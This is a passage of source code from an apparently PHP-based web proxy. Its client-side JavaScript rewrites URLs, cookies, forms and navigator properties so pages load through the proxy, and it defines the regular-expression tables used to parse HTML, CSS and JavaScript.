	this.set_servername=function(servername){ if(servername==undefined) servername=""; this.servername=servername; }
	this.get_portval=function(){ return ((this.portval=="")?(this.get_proto()=="https"?"443":"80"):this.portval); }
	this.set_portval=function(port){ if(port==undefined) port=""; this.portval=((parseInt(port)!=80)?port:"").toString(); }
	this.get_path=function(){ // ***
		if(this.path.indexOf("/../")!=-1) this.path=this.path.replace(/(?:\/[^\/]+){0,1}\/\.\.\//g,"/");
		if(this.path.indexOf("/./")!=-1) while((path=this.path.replace("/./","/")) && path!=this.path) this.path=path;
		return this.path;
	}
	this.set_path=function(path){ if(path==undefined) path="/"; this.path=path; }
	this.get_file=function(){ return this.file; }
	this.set_file=function(file){ if(file==undefined) file=""; this.file=file; }
	this.get_query=function(){ return this.query; }
	this.set_query=function(query){ if(query==undefined) query=""; this.query=query; }
	this.get_label=function(){ return this.label; }
	this.set_label=function(label){ if(label==undefined) label=""; this.label=label; }

	this.get_url=function(){
		if(this.locked) return this.url;
		return this.get_proto()+"://"+
		       (this.get_userpass()==""?"":this.get_userpass()+"@")+
		       this.get_servername()+
		       (parseInt(this.get_portval())==80?"":":"+parseInt(this.get_portval()))+
		       this.get_path()+this.get_file()+
		       (this.get_query()==""?"":"?"+this.get_query())+
		       (this.get_label()==""?"":"#"+this.get_label())
		;
	}

	this.surrogafy=function(){
		var url=this.get_url();
		if(this.locked || this.get_proto()+this.get_fieldreq(2,this.get_userpass())+this.get_servername()+this.get_path()+this.get_file()==this.THIS_SCRIPT) return url;
		var label=this.get_label();
		this.set_label();
		if(this.ENCRYPT_URLS && !this.locked) url=<?php echo(COOK_PREF); ?>.pe.proxenc(url);
		//url=this.THIS_SCRIPT+"?="+(!this.ENCRYPT_URLS?escape(url):url); // urlencode()d
		url=this.THIS_SCRIPT+"?="+url; // urlencode()d
		this.set_label(label);
		return url;
	}

	if(url.length><?php echo(MAXIMUM_URL_LENGTH)?>){
		//alert(this.url); // DEBUG
		//alert(this.url.length); // DEBUG
		this.url="";
	}
	else{
		//this.url=preg_replace("/&#([0-9]+);/e","chr(\\1)" // parse like PHP does for &#num; HTML entities? // TODO?
		this.url=this.trim(url.replace("&amp;","&").replace("\r","").replace("\n",""));
	}

	this.topurl=topurl;
	this.locked=url.match(<?php echo(AURL_LOCK_REGEXP); ?>); //*

	if(!this.locked){
		var urlwasvalid=true;
		if(!this.url.match(this.URLREG)){
			urlwasvalid=false;
			if(this.topurl==undefined) this.url="http://"+((this.url.charAt(0)==":" || this.url.charAt(0)=="/")?this.url.substring(1):this.url)+(this.url.indexOf("/")!=-1?"":"/");
			else{
				var newurl=this.topurl.get_proto()+"://"+this.get_fieldreq(2,this.topurl.get_userpass())+this.topurl.get_servername()+((this.topurl.get_portval()!=80 && (this.topurl.get_proto()=="https"?this.topurl.get_portval()!=443:true))?":"+this.topurl.get_portval():"");
				if(this.url.substring(0,1)!="/") newurl+=this.topurl.get_path();
				this.url=newurl+this.url;
			}
		}

		this.set_proto((urlwasvalid || this.topurl==undefined?this.url.replace(/^([^:]+).*$/,"\$1"):this.topurl.get_proto()));
		this.set_userpass(this.url.replace(this.URLREG,"\$2"));
		this.set_servername(this.url.replace(this.URLREG,"\$3"));
		this.set_portval(this.url.replace(this.URLREG,"\$4"));
		this.set_path(this.url.replace(this.URLREG,"\$5"));
		this.set_file(this.url.replace(this.URLREG,"\$6"));
		this.set_query(this.url.replace(this.URLREG,"\$7"));
		this.set_label(this.url.replace(this.URLREG,"\$8"));
	}

	//if(!this.locked && !this.url.match(this.URLREG)) havok(7,this.url); //*
},

surrogafy_url:function(url,topurl,addproxy){
	url=url.toString();
	if(!url.substring) return;
	if(addproxy==undefined) addproxy=true;
	var urlquote="";
	if((url.substring(0,1)=="\"" || url.substring(0,1)=="'") && url.substring(0,1)==url.substring(url.length-1,url.length)){
		urlquote=url.substring(0,1);
		url=url.substring(1,url.length-1);
	}
	if(topurl==undefined) topurl=this.curr_urlobj;
	var urlobj=new this.aurl(url,topurl);
	var new_url=(addproxy?urlobj.surrogafy():urlobj.get_url());
	if(urlquote!="") new_url=urlquote+new_url+urlquote;
	return new_url;
},

surrogafy_url_toobj:function(url,topurl,addproxy){
	url=url.toString();
	if(!url.substring) return;
	if(addproxy==undefined) addproxy=true;
	if((url.substring(0,1)=="\"" || url.substring(0,1)=="'") && url.substring(0,1)==url.substring(url.length-1,url.length)) url=url.substring(1,url.length-1);
	if(topurl==undefined) topurl=this.curr_urlobj;
	return new this.aurl(url,topurl);
},

de_surrogafy_url:function(url){
	if(url==undefined) return "";
	url=url.toString();
	if(url.match(<?php echo(FRAME_LOCK_REGEXP); ?>) || !url.match(<?php echo(AURL_LOCK_REGEXP); ?>)) return url;
	return this.pe.proxdec(decodeURIComponent(url.substring(url.indexOf('?')+1).replace(<?php echo(PAGETYPE_REGEXP); ?>,"\$2"))); // urldecode()
},

add_querystuff:function(url,querystuff){
	var pos=url.indexOf('?');
	return url.substr(0,pos+1)+querystuff+url.substr(pos+1,url.length-pos);
},

preg_match_all:function(regexpstr,string){
	var matcharr=new Array();
	var regexp=new RegExp(regexpstr);
	var result;
	while(true){
		result=regexp.exec(string);
		if(result!=null) matcharr.push(result);
		else break;
	}
	return matcharr;
},

framify_url:function(url,frame_type){
	if((frame_type!==<?php echo(PAGETYPE_FRAME_TOP); ?> || !this.URL_FORM) && (frame_type!==<?php echo(PAGETYPE_FRAMED_PAGE); ?> && !this.PAGE_FRAMED)) return url;
	var urlquote="";
	if((url.substring(0,1)=="\"" || url.substring(0,1)=="'") && url.substring(0,1)==url.substring(url.length-1,url.length)){
		urlquote=url.substring(0,1);
		url=url.substring(1,url.length-1);
	}
	if(!url.match(<?php echo(FRAME_LOCK_REGEXP); ?>)){
		var query;
		if(frame_type===<?php echo(PAGETYPE_FRAME_TOP); ?> && this.URL_FORM) query='&=';
		else if(frame_type===<?php echo(PAGETYPE_FRAMED_CHILD); ?>) query='.&=';
		else if(frame_type===<?php echo(PAGETYPE_FRAMED_PAGE); ?> || this.PAGE_FRAMED) query='_&=';
		else query='';
		url=url.replace(/^([^\?]*)[\?]?<?php echo(PAGETYPE_MINIREGEXP); ?>([^#]*?[#]?.*?)$/,'\$1?='+query+'\$3');
	}
	if(urlquote!="") url=urlquote+url+urlquote;
	return url;
},

parse_html:function(regexp,partoparse,html,addproxy,framify){
	var match,begin,end,nurl;
	if(html.match(regexp)){
		var matcharr=this.preg_match_all(regexp,html);
		var newhtml="";
		for(var key in matcharr){
			/*match=matcharr[i];
			nurl=this.surrogafy_url(match[partoparse],undefined,addproxy);
			nhtml=match[0].replace(match[partoparse],nurl);
			html=html.replace(match[0],nhtml);*/
			match=matcharr[key];
			if(match[partoparse]!=undefined){
				begin=html.indexOf(match[partoparse]);
				end=begin+match[partoparse].length;
				nurl=this.surrogafy_url(match[partoparse],undefined,addproxy);
				if(framify) nurl=this.framify_url(nurl,framify);
				newhtml+=html.substring(0,begin)+nurl;
				html=html.substring(end);
			}
		}
		html=newhtml+html;
	}
	return html;
},

parse_all_html:function(){
	if(arguments[0]==null) return;
	var html=arguments[0].toString();
	var key;
	for(var key in regexp_arrays){
		if((arguments.length>1 && key!=arguments[1]) || key=='text/javascript') continue;
		arr=regexp_arrays[key];
		for(var regexp_arraykey in arr){
			regexp_array=arr[regexp_arraykey];
			if(regexp_array[0]==undefined) continue;
			if(regexp_array[0]==1) html=html.replace(regexp_array[1],regexp_array[2]);
			else if(regexp_array[0]==2){
				addproxy=(regexp_array.length>3?regexp_array[3]:true);
				framify=(regexp_array.length>4?regexp_array[4]:false);
				html=this.parse_html(regexp_array[1],regexp_array[2],html,addproxy,framify);
			}
		}
	}
	return html;
},

form_button:null,
form_encrypt:function(form){
	if(form.method=='post') return true;
	//action=form.<php echo(COOK_PREF); ?>.value;
	var action=form.getElementsByName(this.COOK_PREF)[0].value;
	for(var i=1;i<form.elements.length;i++){
		if(form.elements[i].disabled || form.elements[i].name=='' || form.elements[i].value=='' || form.elements[i].type=='reset') continue;
		if(form.elements[i].type=='submit'){
			if(form.elements[i].name!=this.form_button) continue;
			this.form_button=null;
		}
		var pref;
		if(!action.match(/\?/)) pref="?";
		else pref="&";
		action+=pref+form.elements[i].name+"="+form.elements[i].value;
	}
	location.href=this.surrogafy_url(action);
	return false;
},

setAttr:function(obj,attr,val){
	if(typeof(attr)!=typeof("")){
		attr=attr.toString();
		attr=attr.substr(1,attr.length-2);
	}

	if(attr=="innerHTML"){
		obj[attr]=this.parse_all_html(val);
		return obj[attr];
	}

	if(obj==location && attr=="hostname") return this.LOCATION_HOSTNAME;

	if(obj==document && attr=="cookie"){
		const COOK_REG=/^([^=]*)=([^;]*)(?:;[\s\S]*?)?$/i;
		var realhost=this.LOCATION_HOSTNAME.replace("/^www/i","").replace(".","_");
		var cookkey=val.replace(COOK_REG,"\$1");
		var cookval=val.replace(COOK_REG,"\$2");
		if(this.ENCRYPT_COOKS){
			cookkey=proxenc(cookkey);
			cookval=proxenc(cookval);
		}
		var newcookie=realhost+"<?php echo(COOKIE_SEPARATOR); ?>"+cookkey+"="+cookval+"; ";
		document.cookie=newcookie;
		return newcookie;
	}

	if(obj==location && attr=="search"){
		if(val.substr(0,1)=="?") val=val.substr(1);
		this.curr_urlobj.set_query(val);
		val=this.curr_urlobj.get_url();
		attr="href";
	}

	var proxurl=val;
	if(attr!="cookie" && attr!="search" && attr!="hostname"){
		proxurl=this.surrogafy_url(val);

		// tags framified  must match REGEXPS with regexp_array[5]
		if(obj.tagName=="A" || obj.tagName=="AREA")
			proxurl=this.framify_url(proxurl,<?php echo(NEW_PAGETYPE_FRAME_TOP); ?>);
		else if(obj.tagName=="FRAME" || obj.tagName=="IFRAME")
			proxurl=this.framify_url(proxurl,<?php echo(PAGETYPE_FRAMED_CHILD); ?>);
	}

	if(this.URL_FORM){
		if((obj==location && attr=="href") || attr=="location"){
			urlobj=this.surrogafy_url_toobj(val);
			if(!urlobj.locked) proxurl=this.add_querystuff(proxurl,"=&");
			this.thetop.location.href=proxurl;
		}
		else obj[attr]=proxurl;
	}
	else obj[attr]=proxurl;
},

getAttr:function(obj,attr){
	if(typeof(attr)!=typeof("")){
		attr=attr.toString();
		attr=attr.substr(1,attr.length-2);
	}

	if(obj==document && attr=="cookie"){
		var ocookies=this.getCookieArr();
		var cookies="",ocook;
		const COOK_REG=/^([\s\S]*)<?php echo(COOKIE_SEPARATOR); ?>([^=]*)=([\s\S]*)(?:; )?$/i;
		for(var key in ocookies){
			ocook=ocookies[key];
			if(typeof(ocook)!=typeof("")) continue;
			if(ocook.match(COOK_REG)==null) continue;
			var realhost=this.LOCATION_HOSTNAME.replace("/^www/i","").replace(".","_");
			var cookhost=ocook.replace(COOK_REG,"\$1");
			if(cookhost==realhost){
				if(this.ENCRYPT_COOKS){
					var cookkey=this.pe.proxdec(ocook.replace(COOK_REG,"\$2"));
					var cookval=this.pe.proxdec(ocook.replace(COOK_REG,"\$3"));
					cookies+=cookkey+"="+cookval+"; ";
				}
				else cookies+=ocook.replace(COOK_REG,"\$2=\$3; ");
			}
		}
		return cookies;
	}

	if(obj==navigator){
		if(this.USERAGENT=="-1" && (attr!="plugins" && attr!="mimeType")) return undefined;
		if(this.USERAGENT=="") return obj[attr];
		var msie=this.USERAGENT.match(/msie/i);
		const UA_REG=/^([^\/\(]*)\/?([^ \(]*)[ ]*(\(?([^;\)]*);?([^;\)]*);?([^;\)]*);?([^;\)]*);?([^;\)]*);?[^\)]*\)?)[ ]*([^ \/]*)\/?([^ \/]*).*$/i;
		switch(attr){
			case "userAgent": return this.USERAGENT;
			case "appCodeName": return this.USERAGENT.replace(UA_REG,"\$1");
			case "appVersion": return (msie?this.USERAGENT.replace(UA_REG,"\$2 \$3"):this.USERAGENT.replace(UA_REG,"\$2 (\$4; \$7)"));
			case "platform":
				var tempplatform=this.USERAGENT.replace(UA_REG,"\$4");
				return (tempplatform=="compatible" || tempplatform=="Windows"?"Win32":this.USERAGENT.replace(UA_REG,"\$6"));
			case "oscpu": return (msie?undefined:this.USERAGENT.replace(UA_REG,"\$6"));
			case "language": return (msie?undefined:this.USERAGENT.replace(UA_REG,"\$7"));
			case "appName":
				var tempappname=(msie?"Microsoft Internet Explorer":this.USERAGENT.replace(UA_REG,"\$1"));
				if(tempappname=="Opera" || tempappname=="Mozilla") tempappname="Netscape";
				return tempappname;
			case "product": return (msie?undefined:this.USERAGENT.replace(UA_REG,"\$9"));
			case "productSub": return (msie?undefined:this.USERAGENT.replace(UA_REG,"\$10"));
			case "plugins": return (<?php echo((empty($_COOKIE[COOK_PREF.'_remove_objects'])?'1':'0')); ?>==1?navigator.plugins:undefined);
			case "mimeType": return navigator.mimeType;
			default: return undefined;
		}
	}

	if(obj==location && attr=="search") url=location.href;
	else url=obj[attr];
	url=this.de_surrogafy_url(url);
	if(obj==location && attr=="search") url=url.replace(/^[^?]*/,"");
	return url;
},

eventify:function(a1,a2){
	document.getElementsByTagName("head")[0].addEventListener("load",function(){<?php echo(COOK_PREF); ?>.setParentStuff(a1,a2);},false);
	window.addEventListener("load",function(){<?php echo(COOK_PREF); ?>.setParentStuff(a1,a2);},false);
	this.setParentURL(this.CURR_URL);
},

setParentURL:function(url){
	if(this.thetop!=null && this.thetop!=window){
		this.thetop.document.getElementById('url').value=url;
		this.thetop.document.getElementById('proxy_link').href=this.add_querystuff(this.surrogafy_url(url),"=-&");
	}
},

setParentStuff:function(proto,server){ // amazing creativity with the name on my part
	var topdoc=this.thetop.document;
	topdoc.title=document.title;

	// find and set shortcut icon
	var tophead=topdoc.getElementsByTagName("head")[0];
	var links=tophead.getElementsByTagName("link");
	var link=null;
	for(var i=0; i<links.length; i++){ if(links[i].type=="image/x-icon" && links[i].rel=="shortcut icon") link=links[i]; }

	if(tophead.getElementsByTagName("link").length>0) tophead.removeChild(topdoc.getElementsByTagName("link")[0]);

	var favicon=topdoc.createElement("link");
	favicon.type="image/x-icon";
	favicon.rel="shortcut icon";
	favicon.href=(link==null?this.surrogafy_url(proto+"://"+server+"/favicon.ico"):link.href);
	tophead.appendChild(favicon);
},

XMLHttpRequest_wrap:function(xmlhttpobj){
	xmlhttpobj.<?php echo(COOK_PREF); ?>_open=xmlhttpobj.open;
	xmlhttpobj.open=<?php echo(COOK_PREF); ?>.XMLHttpRequest_open;
	return xmlhttpobj;
},

XMLHttpRequest_open:function(){
	if(arguments.length<2) return;
	arguments[1]=<?php echo(COOK_PREF); ?>.surrogafy_url(arguments[1]);
	return this.<?php echo(COOK_PREF); ?>_open.apply(this,arguments);
},

// WRAPPED FUNCTIONS AND OBJECTS
thetop:top,
theparent:parent,
setTimeout:window.setTimeout,
setInterval:window.setInterval,
document_write_queue:"",
purge:function(){
	thehtml=this.document_write_queue;
	if(thehtml=="") return;
	thehtml=this.parse_all_html(thehtml);
	this.document_write_queue="";
	//alert(thehtml); // DEBUG
	document.write_<?php echo(COOK_PREF); ?>(thehtml);
},

purge_noparse:function(){
	thehtml=this.document_write_queue;
	if(thehtml=="") return;
	this.document_write_queue="";
	document.write_<?php echo(COOK_PREF); ?>(thehtml);
}

}

// }}}

// JAVASCRIPT FUNCS: WRAPPING {{{

document.write_<?php echo(COOK_PREF); ?>=document.write;
document.writeln_<?php echo(COOK_PREF); ?>=document.writeln;
document.write=function(html){ <?php echo(COOK_PREF); ?>.document_write_queue+=html; }
document.writeln=function(html){ <?php echo(COOK_PREF); ?>.document_write_queue+=html+"\n"; }

window.open_<?php echo(COOK_PREF); ?>=window.open;
window.open=document.open=function(){
	if(arguments.length<1) return;
	var url=<?php echo(COOK_PREF); ?>.surrogafy_url(arguments[0]);
	if((url.substring(0,1)=="\"" || url.substring(0,1)=="'") && url.substring(0,1)==url.substring(url.length-1,url.length)) url=url.substring(1,url.length-1);
	arguments[0]=url;
	return window.open_<?php echo(COOK_PREF); ?>.apply(this.caller,arguments);
}

setTimeout=function(){
	if(arguments.length<2) return;
	arguments[0]=<?php echo(COOK_PREF); ?>.parse_all_html(arguments[0],"application/x-javascript");
	return <?php echo(COOK_PREF); ?>.setTimeout.apply(this,arguments);
}

setInterval=function(){
	if(arguments.length<2) return;
	arguments[0]=<?php echo(COOK_PREF); ?>.parse_all_html(arguments[0],"application/x-javascript");
	return <?php echo(COOK_PREF); ?>.setInterval.apply(this,arguments);
}

/* hooking for eval(), not necessary anymore, but worked relatively well in the past
/*eval_<?php echo(COOK_PREF); ?>=eval;
eval=function(){
	if(arguments.length<1) return;
	arguments[0]=<?php echo(COOK_PREF); ?>.parse_all_html(arguments[0],"application/x-javascript");
	return eval_<?php echo(COOK_PREF); ?>.apply(this.caller,arguments);
}*/

// wrap top and parent objects for anti-frame breaking
if(<?php echo(COOK_PREF); ?>.PAGE_FRAMED){
	if(parent==top) parent=self;
	if(top!=self) top=<?php echo(COOK_PREF); ?>.thetop.frames[0];
}

// }}}

//</script><?php exit(); }

# }}}

# REGEXPS {{{

# This is where all the parsing is defined.  If a site isn't being
# parsed properly, the problem is more than likely in this section.
# The rest of the code is just there to set up this wonderful bunch
# of incomprehensible regular expressions.


# REGEXPS: CONVERSION TO JAVASCRIPT {{{

function bool_to_js($bool){ return ($bool?'true':'false'); }
function convertarray_to_javascript(){
	global $regexp_arrays;
	$js='regexp_arrays=new Array('.count($regexp_arrays).");\n";
	reset($regexp_arrays);
	while(list($key,$arr)=each($regexp_arrays)){
		$js.="regexp_arrays[\"$key\"]=new Array(".count($arr).");\n";
		for($i=0;$i<count($arr);$i++){
			$js.="regexp_arrays[\"$key\"][$i]=new Array(";
			if($arr[$i][0]==1) $js.='1,'.escape_regexp($arr[$i][2]).'g,"'.escape_regexp($arr[$i][3],true).'"';
			elseif($arr[$i][0]==2) $js.='2,'.escape_regexp($arr[$i][2])."g,{$arr[$i][3]}".(count($arr[$i])<5?null:','.bool_to_js($arr[$i][4])).(count($arr[$i])<6?null:",{$arr[$i][5]}");
			$js.=");\n";
		}
	}
	return stripslashes($js);
}

# }}}

# REGEXPS: VARIABLES {{{

global $regexp_arrays;

# 'img' was in $jsattrs... what's that for?
$jsattrs='(?:href|src|location|action|backgroundImage|pluginspage|codebase|location\.href|innerHTML)';
$jshookattrs="(?:{$jsattrs}|cookie|search|hostname)";
$jshookgetattrs="(?:{$jshookattrs}|userAgent|platform|appCodeName|appName|appVersion|language|oscpu|product|productSub|plugins)";
//$jshtmlattrs='(innerHTML)';
$jsmethods='(location\.(?:replace|assign))';
$jslochost='(location\.host(?:name){0,1})';
//$jslocsearch='(location\.search)';
//$jsrealpage='((?:(?:document|window)\.){0,1}location(?:(?=[^\.])|\.href)|document\.documentURI|[a-z]+\.referrer)';
$htmlattrs='(data|href|src|background|pluginspage|codebase|action)';

$justspace="[\t ]*";
$plusjustspace="[\t ]+";
$anyspace="[\t\r\n ]*";
$plusspace="[\t\r\n ]+";
$operands='[\+\-\/\*]';
$notoperands='[^\+\-\/\*]';

$quoteseg='(?:"(?:[^"]|[\\\\]")*?"|\'(?:[^\']|[\\\\]\')*?\'';
$regseg='\/(?:[^\/]|[\\\\]\/)*?\/';

//$jsobjsect="{$jsvarsect}(?:\((?:{$quoteseg}|{$jsvarsect}|))\))?";
//$jsobjsect="{$jsvarsect}(?:\({$anyspace}(?:{$quoteseg}|{$jsvarsect}|))(?:{$anyspace},{$anyspace}{$quoteseg}|{$jsvarsect}|))*{$anyspace}\))?(?:\[(?:{$quoteseg}|{$jsvarsect}|))\])?";
//$jsobjsect="{$jsvarsect}(?:\((?:[^\(\)\"']*(?:{$quoteseg}|(?R))))\))?(?:\[(?:[^\[\]\"']*(?:{$quoteseg}|(?R))))\])?";
//$jsvarobj='(?:[a-zA-Z0-9\._\(\)\[\]\+\-]+)';
$jsvarsect='[a-zA-Z0-9_\$](?:[a-zA-Z0-9\$\._\/\[\]\+-]*[a-zA-Z0-9_\/\]])?';
$jsobjsect="{$jsvarsect}(?:\((?:{$quoteseg}|{$jsvarsect}|))\))?(?:\[(?:{$quoteseg}|{$jsvarsect}|))\])?";
$jsvarobj="{$jsobjsect}(?:\.{$jsobjsect})*";
//$jsquotereg="((?:(?:{$anyspace}{$quoteseg}|{$jsvarobj}){$anyspace}\+)*){$anyspace}{$quoteseg}|{$jsvarobj}){$justspace}(?=[;\}\n\r]))"; # HUH?
$jsquotesect="(?:{$anyspace}{$quoteseg}|{$jsvarobj}))";
$jsquotereg="{$jsquotesect}(?:\+{$jsquotesect})*";

//$notjsvarsect='[^a-zA-Z0-9\._\[\]\+-]';
//$notjsvarsect='[^a-zA-Z0-9\._\[\]\/]';
$notjsvarsect='[^a-zA-Z0-9\._\[\]]';

//$jsend="(?={$anyspace}[;\}\n\r\'\"])";
//$jsend="(?={$anyspace}(?:[;\}]|{$notoperands}[\n\r]))";
$jsend="(?={$justspace}(?:[;\}\n\r]|{$notoperands}[\n\r]))";
$notjsend="(?!{$justspace}(?:[;\}\n\r]|{$notoperands}[\n\r]))";
$jsbegin="((?:[;\{\}\n\r\(\)]|[\!=]=){$anyspace})";
//$jsbeginright="((?:[;\{\}\n\r\(\)=\+\-\/\*]){$anyspace})";
$jsbeginright="((?:[;\{\}\(\)=\+\-\/\*]){$justspace})";

$htmlnoquot='(?:[^"\'\\\\][^> ]*)';
$htmlnoquotnoqm='(?:[^\?"\'\\\\][^\?> ]*)';
$htmlreg="({$quoteseg}|{$htmlnoquot}))";
$xmlhttpreq="(?:XMLHttpRequest{$anyspace}(?:\({$anyspace}\)|)|ActiveXObject{$anyspace}\({$anyspace}[^\)]+\.XMLHTTP['\"]{$anyspace}\))(?=;)";
$jsnewobj="(?:{$anyspace}new{$plusspace}|{$anyspace})";
$formnotpost="(?:(?!method{$anyspace}={$anyspace}(?:'|\")?post)[^>])";
$frametargets='_(?:top|parent|self)';

$js_string_methods='(?:anchor|big|blink|bold|charAt|charCodeAt|concat|fixed|fontcolor|fontsize|fromCharCode|indexOf|italics|lastIndexOf|link|match|replace|search|slice|small|split|strike|sub|substr|substring|sup|toLowerCase|toUpperCase|toSource|valueOf)';
$js_string_attrs='(?:constructor|length|prototype)';

# }}}

# REGEXPS: JAVASCRIPT PARSING {{{

$js_regexp_arrays=array(
	array(1,2,"/{$jsbegin}({$jsvarobj})\.({$jshookgetattrs}){$anyspace}\+=/i",'\1\2.\3='.COOK_PREF.'.getAttr(\2,/\3/)+'),
	array(1,2,"/{$jsbegin}({$jsvarobj})\.(({$jshookattrs}){$anyspace}=(?:{$anyspace}{$jsvarobj}{$anyspace}=)*{$anyspace})((?!\=)({$notjsend}.)*){$jsend}/i",'\1'.COOK_PREF.'.setAttr(\2,/\4/,\5)'),
	array(1,2,"/{$jsbeginright}({$jsvarobj})\.({$jshookgetattrs})([^\.=a-z0-9_\[\]\t\r\n]|\.{$js_string_methods}\(|\.{$js_string_attrs}{$notjsvarsect})/i",'\1'.COOK_PREF.'.getAttr(\2,/\3/)\4'),

	array(1,2,"/([^a-z0-9]{$jsmethods}{$anyspace}\()([^)]*)\)/i",'\1'.COOK_PREF.'.surrogafy_url(\3))'),
	array(1,2,"/([^a-z0-9])eval{$anyspace}\(({$anyspace}{$jsvarobj})\)/i",'\1eval('.COOK_PREF.'.parse_all_html(\2,"application/x-javascript"))'),

	array(1,2,"/{$jsbegin}\.action{$anyspace}=/i",'\1.'.COOK_PREF.'.value='),
	//array(1,2,"/{$jsbegin}(\.setAttribute{$anyspace}\({$anyspace}(\"|')({$jsattrs})(\\2){$anyspace},{$anyspace})(.*?){$jsend}/i",'\1\2'.COOK_PREF.'.surrogafy_url(\6)'),
	//array(1,2,"/{$jsbegin}(\.setAttribute{$anyspace}\({$anyspace}(\"|')({$jsattrs})(\\2){$anyspace},{$anyspace})(.*?){$jsend}/i",'\1\2'.COOK_PREF.'.surrogafy_url(\6)'),
	array(1,2,"/{$jsbegin}({$jsvarobj})\.setAttribute{$anyspace}\({$anyspace}({$jsquotereg}){$anyspace},{$anyspace}({$jsquotereg}){$anyspace}\)/i",'\1'.COOK_PREF.'.setAttr(\2,\3,\4)'),
	array(1,2,"/{$jsbegin}([^\ {>\t\r\n=;]+{$anyspace}=)({$jsnewobj}{$xmlhttpreq})/i",'\1\2'.COOK_PREF.'.XMLHttpRequest_wrap(\3)'),
	array(1,2,"/{$jsbegin}(return{$plusspace})({$jsnewobj}{$xmlhttpreq})/i",'\1\2'.COOK_PREF.'.XMLHttpRequest_wrap(\3)'),
	(ENCRYPT_URLS?array(1,2,"/{$jsbegin}((?:[^\) \{\}]*(?:\)\.{0,1}))+)(\.submit{$anyspace}\(\)){$jsend}/i",'\1void((\2.method=="post"?null:\2\3));'):null),
);

# }}}

# REGEXPS: HTML/CSS PARSING {{{

$regexp_arrays=array(
	'text/html' => array(
		## do HTML based javascript stuff # OLDWAY
		#array(1,1,"/( on[a-z]{3,20}{$anyspace}={$anyspace})(?:(\")([^\"]+)(\")|(')([^']+)('))/i",'\1\2\5;\3\6;\4\7'), # OLDWAY
		#array(1,2,"/(<script(?:(?:(?! src{$anyspace}=)[^>])*)>)([\s\S]*?)(?:{$anyspace}(?:\/\/)?{$anyspace}-->{$anyspace})?<\/script>/i",'\1\2;'.COOK_PREF.'.purge();//--></script>'), # OLDWAY

		# target attr
		(PAGETYPE_ID===PAGETYPE_FRAMED_PAGE?array(1,1,"/(<[a-z][^>]*{$anyspace}) target{$anyspace}={$anyspace}(?:{$frametargets}|('){$frametargets}'|(\"){$frametargets}\")/i",'\1'):null),
		(PAGETYPE_ID===PAGETYPE_FRAMED_CHILD?array(1,1,"/(<[a-z][^>]*{$anyspace} target{$anyspace}={$anyspace})(?:_top|(')_top'|(\")_top\")/i",'\1\2\3'.COOK_PREF.'_top\2\3'):null),

		# deal with <form>s
		array(1,1,"/(<form{$formnotpost}*?)(?:{$plusspace}action{$anyspace}={$anyspace}{$htmlreg})({$formnotpost}*)>/i",'\1\3><input type="hidden" name="" class="'.COOK_PREF.'" value=\2 />'),
		array(2,1,"/<input type=\"hidden\" name=\"\" class=\"".COOK_PREF."\" value{$anyspace}={$anyspace}{$htmlreg} \/>/i",1,false),
		array(1,1,'/(<form[^>]*?)>/i','\1 target="_self"'.(ENCRYPT_URLS?' onsubmit="return '.COOK_PREF.'.form_encrypt(this);">':'>')),
		array(1,1,"/(<form{$formnotpost}+)>(?!<!--".COOK_PREF.'-->)/i','\1 target="_parent"><!--'.COOK_PREF.'--><input type="hidden" name="" value="_">'),

		# deal with the form button for encrypted URLs
		(ENCRYPT_URLS?array(1,1,"/(<input[^>]*? type{$anyspace}={$anyspace}(?:\"submit\"|'submit'|submit)[^>]*?[^\/])((?:[ ]?[\/])?>)/i",'\1 onclick="'.COOK_PREF.'_form_button=this.name;"\2'):null),

		# parse all the other tags
		array(2,1,"/<[a-z][^>]*{$plusspace}{$htmlattrs}{$anyspace}={$anyspace}{$htmlreg}/i",2),
		array(2,1,"/<param[^>]*{$plusspace}name{$anyspace}={$anyspace}[\"']?movie[^>]*{$plusspace}value{$anyspace}={$anyspace}{$htmlreg}/i",1),
		array(2,2,"/<script[^>]*?{$plusspace}src{$anyspace}={$anyspace}([\"']){$anyspace}(.*?[^\\\\])\\1[^>]*>{$anyspace}<\/script>/i",2),
		(URL_FORM && PAGE_FRAMED?array(2,1,"/<a(?:rea)?{$plusspace}[^>]*href{$anyspace}={$anyspace}{$htmlreg}/i",1,false,NEW_PAGETYPE_FRAME_TOP):null),
		(URL_FORM && PAGE_FRAMED?array(2,1,"/<[i]?frame{$plusspace}[^>]*src{$anyspace}={$anyspace}{$htmlreg}/i",1,false,PAGETYPE_FRAMED_CHILD):null)
	),

	'text/css' => array(
		array(2,1,"/[^a-z]url\({$anyspace}(&(?:quot|#(?:3[49]));|\"|')(.*?[^\\\\])(\\1){$anyspace}\)/i",2),
		array(2,1,"/[^a-z]url\({$anyspace}((?!&(?:quot|#(?:3[49]));)[^\"'\\\\].*?[^\\\\]){$anyspace}\)/i",1),
		array(2,1,"/@import{$plusspace}(&(?:quot|#(?:3[49]));|\"|')(.*?[^\\\\])(\\1);/i",2)
	),

	'application/x-javascript' => $js_regexp_arrays,
	'text/javascript' => $js_regexp_arrays
);

# }}}

# REGEXPS: INSERT JAVASCRIPT REGEXPS {{{

if(QUERY_STRING=='js_regexps' || QUERY_STRING=='js_regexps_framed'){ ?>//<script>
<?php echo(convertarray_to_javascript().((!empty($_COOKIE[COOK_PREF.'_remove_objects']))?'regexp_arrays["text/html"].push(Array(1,/<[\\\\/]?(embed|param|object)[^>]*>/ig,""));':null)); ?>
//</script><?php exit(); }

# }}}

# REGEXPS: SERVER-SIDE ONLY PARSING {{{

array_push($regexp_arrays['text/html'],
	array(2,1,"/<meta[^>]*{$plusspace}http-equiv{$anyspace}={$anyspace}([\"']|)refresh\\1[^>]* content{$anyspace}={$anyspace}([\"']|)[ 0-9\.;\t\\r\n]*url=(.*?)\\2[^>]*>/i",3,true,NEW_PAGETYPE_FRAMED_PAGE),
	array(1,1,"/(<meta[^>]*{$plusspace}http-equiv{$anyspace}={$anyspace}([\"']|)set-cookie\\2[^>]* content{$anyspace}={$anyspace})([\"'])(.*?[^\\\\]){$anyspace}\\3/i",'\1\3'.PAGECOOK_PREFIX.'\4\3')
);

# }}}

# REGEXPS: CLEANUP {{{

# needed later, but $anyspace and $htmlreg are unset below
define('BASE_REGEXP',"<base[^>]* href{$anyspace}={$anyspace}{$htmlreg}[^>]*>");
define('END_OF_SCRIPT_TAG',"(?:{$anyspace}(?:\/\/)?{$anyspace}-->{$anyspace})?<\/script>");
